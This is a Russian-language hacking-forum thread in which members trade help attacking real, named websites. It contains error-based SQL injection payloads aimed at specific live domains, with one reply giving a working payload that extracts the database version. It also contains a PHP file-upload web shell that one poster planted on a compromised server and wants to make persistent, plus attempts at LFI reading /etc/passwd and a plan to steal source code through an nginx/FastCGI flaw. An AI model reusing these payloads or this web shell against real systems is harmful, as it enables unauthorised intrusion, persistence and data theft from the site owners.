Ребята как раскрутить дальше?? Code: http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,version()+)+)+)='1 делал так Code: http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+)+)+)='1 ОБЛОМ. и так Code: http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+concat(+0x3a,+select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+1,2+)+)+)='1 ОБЛОМ. Так же не решен вопрос с этой скулей Code: http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо
WendM, Держите решение Вашей проблемы: Code: http://www.muscletalk.ru/pharma.php?id=999999.9'+in+(select(@:=1)||@+from+(select+1+union+select+2+union+select+3)k+group+by+concat(@@version,!@)having@||min(@:=0))+and+'1#
Спасибо) Но такой вариант не проходит на Code: http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Тестирую на локалке метод залива шелла через sql inj. Уязвимый php PHP: <?php $link = mysql_connect("localhost", "root", ""); mysql_select_db("site"); if (!isset($_GET['id'])) { $result=mysql_query("SELECT * FROM news"); while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { print "<a href='mynews.php?id=".$line['id']."'>Новость №".$line['id']."</a><br>"; } exit; } $query = "SELECT text FROM news WHERE id= ".$_GET['id']; $result = mysql_query($query); print "<table>"; while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { print "<tr>"; foreach ($line as $col_value) { print "<td>$col_value</td>"; } print "</tr>"; } print "</table>"; mysql_free_result($result); mysql_close($link); ?> Делаю запрос Code: http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user='root'+--+ Вылетают ошибки. Делаю так Code: http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql.user+where+user=0x27726F6F7427+--+ Выводится First news Что не так делаю?
Получилось залить шелл через phpmyadmin, но админы на серве постоянно переустанавливают свой серв и стирают мой шелл, даже иногда не устанавливают phpmyadmin, но вот седня снова они его установили я побырому залил шел во все щели но это не поможет после переустановки все снова слетит. Но база mysql она всегда таже, вот я и подумал можно ли создать там таблицу с этим кодом PHP: <?php if(isset($_POST[ok])){if(move_uploaded_file($_FILES[fnm][tmp_name], $_POST[name])){echo "<a href=" . $_POST[name] . ">Click</a>";} else {die("err");}}?><form methodost enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit namek><br></form> И как то указать чтоб он автоматически его создавал по указанному адресу например раз в неделю или при его отсутствии. Помогите плииз.
Нашел дыру Nginx & PHP via FastCGI на member.my-addr.com. Хочется слить исходники многих их сервисов. Пример: Залить любой файл на сайт вроде никак. Есть варианты решения проблемы? Описание дыры: _http://cnedelcu.blogspot.com/2010/05/nginx-php-via-fastcgi-important.html
Ваши вопросы по уязвимостям По моему я в правильный раздел написал. Ну не могу я получить количество стандартными grpoup by и order by, так же перебор через union select тоже не дает результата. Мануалы по sql inj молчат на этот случай. Вопрос: " Можно ли получить количество полей при не работающих вариантах с grpoup by и order by. Если да, то как?" tnx!)
LFI не получается найти - задолбался перебирать конструкции ../../etc/passwd, RFI паходу нет. Но при запросе _ttp://www.*********.ru/index.php?page=info.php успешно выводится содержимое инфо.пхп B frame _ttp://www.********.ru/index.php?page=test.php также успешно выводится B frame на странице September 5, 2004 /home/t*******1/public_html/sitenameАга естьли возможность проинклюдить файл info.php или test.php как показано здесь и если да то как потом запустить всю эту конструкцию) если я никак не могу добраца до ../етс/пассвд или не обязательно вообще до него добираться? или как это все осуществить.капец я запутался чета уже
Для заливки шелла через phpinfo();, тебе нужен LFI и доступ к tmp, если не можешь прочетать tmp, то не как. понятное дело ты можешь в сплоите поменять директории, но прав на запись тебе не кто не даст. P.S. сплоит не будет работать, если phpinfo(), не создает глобальный массив $_FILES[]
Это LFI? _http://web.fhnw.ch/technik/projekte/eit/Fruehling2011/JaegLoch/index.php?include= Если да, то почему не получается получить etc/passwd
Я пожалуй повторю: http://forum.antichat.ru/showpost.php?p=3308397&postcount=21440 Я не пойму это юмор какой-то ачатовский, или вы тут всегда так круто всё взламываете?
И взаправду. Чего стоило в базовый код страницы для начала посмотреть? Ты, мистер умник, как раз такой юморной, что только для тебя такие ответы и посты создаются. И во фразе - `Я пожалуй повторю`, после буквы Я ставится запятая.
Не напрягайся =) Там тупой ифрейм. Це не инклуд позор на мои седины. http://www.prodisney.ru/articles/news1012.php?nid='3455&cat=n&f=1 Вот раскрытие путей, как бонус )
